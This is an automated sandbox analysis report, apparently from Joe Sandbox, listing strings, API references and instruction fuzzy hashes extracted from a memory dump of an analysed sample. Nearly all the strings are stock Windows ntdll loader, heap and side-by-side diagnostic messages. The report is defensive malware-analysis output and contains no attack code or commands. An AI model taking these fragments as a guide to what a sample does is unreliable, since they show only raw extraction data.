                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                                              • @, xrefs: 0181259B
                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                              • API String ID: 0-4009184096
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                              • API String ID: 0-2515994595
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                              • API String ID: 0-1700792311
                                                                              Strings
                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                                              • HandleTraces, xrefs: 01828C8F
                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                                              • VerifierDebug, xrefs: 01828CA5
                                                                              • VerifierFlags, xrefs: 01828C50
                                                                              • VerifierDlls, xrefs: 01828CBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                              • API String ID: 0-3223716464
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                              • API String ID: 0-1109411897
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-792281065
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                                              • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                                              • apphelp.dll, xrefs: 01796496
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-204845295
                                                                              Strings
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                                              • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                              • API String ID: 0-861424205
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                                              • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                                              • LdrpInitializeProcess, xrefs: 017DC6C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-475462383
                                                                              APIs
                                                                                • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 1404860816-0
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                              • API String ID: 0-3126994380
                                                                              • Opcode ID: c0787118fc056eae4f68f212585308d4e2aab0b76802e8e59f0e826a7d9af69c
                                                                              • Instruction ID: 114ac5d1014d6d2fd51be5f960bc4d271419f2ce705a0e88e9c81ced2bce6c37
                                                                              • Opcode Fuzzy Hash: c0787118fc056eae4f68f212585308d4e2aab0b76802e8e59f0e826a7d9af69c
                                                                              • Instruction Fuzzy Hash: F1929971A056499FEB25CF68C484BEEFBF1FF48304F188099E859AB352D734A985CB50
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                              • API String ID: 0-379654539
                                                                              • Opcode ID: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                                              • Instruction ID: 54aaf231e38e0a351435c35b25a278ac7f5225bba743e9fb5c22e4c504b0a20f
                                                                              • Opcode Fuzzy Hash: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                                              • Instruction Fuzzy Hash: 5EC18970108386CFD722CF58C444B6ABBE4BF84704F448A6AF995CB291E774CA49CB56
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                                              • @, xrefs: 017D8591
                                                                              • LdrpInitializeProcess, xrefs: 017D8422
                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1918872054
                                                                              • Opcode ID: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                                              • Instruction ID: 6ec6246460fb5a6fada40ab8b3c37fde6894f4bf332429c5d9b9a835b9bc28bb
                                                                              • Opcode Fuzzy Hash: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                                              • Instruction Fuzzy Hash: 59917D71508349AFDB22DF65CC44FABFAECBB88744F84092EF685D6155E370DA048B62
                                                                              Strings
                                                                              • .Local, xrefs: 017D28D8
                                                                              • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                              • API String ID: 0-1239276146
                                                                              • Opcode ID: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                                              • Instruction ID: 4f97195c9fc8651cebf8d861fe21d884024ee1c5286d67f284f5674370681cf4
                                                                              • Opcode Fuzzy Hash: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                                              • Instruction Fuzzy Hash: E6A1C03194122DDFDB25CF68C888BA9F7B5BF58314F2401E9D908AB256D7309E81CF90
                                                                              Strings
                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                                              • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                              • API String ID: 0-1245972979
                                                                              • Opcode ID: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                                              • Instruction ID: f827aaa253511f07f5cc9b38aaee6bba9dc7ff6af19dcea924307b7d8ac94e08
                                                                              • Opcode Fuzzy Hash: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                                              • Instruction Fuzzy Hash: 176124726807169BD722CF1CC881B2AF7F5BFA4B20F148519E95ADB644D730E941CB91
                                                                              Strings
                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                              • API String ID: 0-1468400865
                                                                              • Opcode ID: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                                              • Instruction ID: 7c2dfa66eff94d1b5470e780fa78d6fbd5856dd6ffbe67510d604925c53b3877
                                                                              • Opcode Fuzzy Hash: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                                              • Instruction Fuzzy Hash: C271C3B19043059FCB21DF14C888B97BFE8EF95764F540569F9888B28AD734D688CBD2
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                                              • LdrpDynamicShimModule, xrefs: 0180A998
                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                                              • apphelp.dll, xrefs: 017C2462
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-176724104
                                                                              • Opcode ID: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                                              • Instruction ID: 65cee056b2066928d82769b987613b0d3d33d695c8ffef7258e9a05a6f5d972e
                                                                              • Opcode Fuzzy Hash: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                                              • Instruction Fuzzy Hash: 0B312772700305ABDB369F6D9D85A7AB7B5FB80B04F29005DE910EB299D7705B82CB80
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-4253913091
                                                                              • Opcode ID: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                                              • Instruction ID: 3f3996ded880afc01c262e04e5cee863ba4d9cb064f5ea5ec26da780ab3128a9
                                                                              • Opcode Fuzzy Hash: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                                              • Instruction Fuzzy Hash: 04F17B7060060ADFEB26CF68C894BAAF7B5FF44304F1441A9E516DB391D734AA81CFA1
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $@
                                                                              • API String ID: 0-1077428164
                                                                              • Opcode ID: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                                              • Instruction ID: db0707ec75cb0474648c57400a13013647d83ae859605bd890c0634074a79e99
                                                                              • Opcode Fuzzy Hash: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                                              • Instruction Fuzzy Hash: E6C290716083459FE769CF28C881BABFBE5AF88B14F04896DF989C7241DB34D944CB52
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                              • API String ID: 0-2779062949
                                                                              • Opcode ID: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                                              • Instruction ID: 7d9f31a89f7b89aeaaaf4388369b03823759dc53d1df58ea0e69746753f3fa86
                                                                              • Opcode Fuzzy Hash: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                                              • Instruction Fuzzy Hash: 57A14A759116299BDF329B68CC88BAAF7B8EF48710F1001E9EA09A7251D7359E84CF50
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                                              • LdrpCheckModule, xrefs: 0180A117
                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-161242083
                                                                              • Opcode ID: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                                              • Instruction ID: c0f141cecd5a7ec74cc0d1f0bc4d602f08999daa9e16230af325f2f954067b4d
                                                                              • Opcode Fuzzy Hash: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                                              • Instruction Fuzzy Hash: 38719E75A00209DFDB2ADF68C985ABEF7F4FB44704F18406DE912EB255E734AA41CB90
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-1334570610
                                                                              • Opcode ID: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                                              • Instruction ID: e2e80ba0867003d9a3af703f4812f989f7b952425e9f15f0da59700d005ab3d6
                                                                              • Opcode Fuzzy Hash: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                                              • Instruction Fuzzy Hash: F361AB716003059FDB29CF28C884BABFBB1FF45704F15859AE449CB292D770E981CB91
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                                              • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1783798831
                                                                              • Opcode ID: 1d06bde46c67385c82113ba81b62511d5641631d378d91c46d3b74bf5c724d61
                                                                              • Instruction ID: b87413ee3b8bd93655c1830a29b9edae4c492469d0ea60f01504acc292a04135
                                                                              • Opcode Fuzzy Hash: 1d06bde46c67385c82113ba81b62511d5641631d378d91c46d3b74bf5c724d61
                                                                              • Instruction Fuzzy Hash: C94125B2541305ABC722EB68DC89B5BB7F8AF48720F19092EF955C3258E770D900CBD1
                                                                              Strings
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                                              • @, xrefs: 0185C1F1
                                                                              • PreferredUILanguages, xrefs: 0185C212
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                              • API String ID: 0-2968386058
                                                                              • Opcode ID: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                                              • Instruction ID: fdef3bdb83965e3a5db392fe3fdfcf626b9385d07723b3fe6b77b9f90721a755
                                                                              • Opcode Fuzzy Hash: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                                              • Instruction Fuzzy Hash: 3D414F75A00209ABDF51DAD8C895BEEFBBCEB14744F14406AEA09F7284D7749A448F90
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                              • API String ID: 0-1373925480
                                                                              • Opcode ID: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                                              • Instruction ID: 6b6053061c039eec3f4e128d070b8199b29d6c8a53a199562ea4480c5d809fb3
                                                                              • Opcode Fuzzy Hash: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                                              • Instruction Fuzzy Hash: 3F412631A00A58CBEB26DFD8C844BADBBB8FF95344F180459D901FB791D7748A41CB90
                                                                              Strings
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                                              • LdrpCheckRedirection, xrefs: 0182488F
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-3154609507
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-2558761708
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                                              • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                                              • LdrpInitializationFailure, xrefs: 018220FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2986994758
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: #%u
                                                                              • API String ID: 48624451-232158463
                                                                              Strings
                                                                              • LdrResSearchResource Exit, xrefs: 017AAA25
                                                                              • LdrResSearchResource Enter, xrefs: 017AAA13
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                              • API String ID: 0-4066393604
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$MUI
                                                                              • API String ID: 0-17815947
                                                                              Strings
                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                                              • kLsE, xrefs: 017A0540
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                              • API String ID: 0-2547482624
                                                                              Strings
                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                              • API String ID: 0-2876891731
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Cleanup Group$Threadpool!
                                                                              • API String ID: 2994545307-4008356553
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: MUI
                                                                              • API String ID: 0-1339004836
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
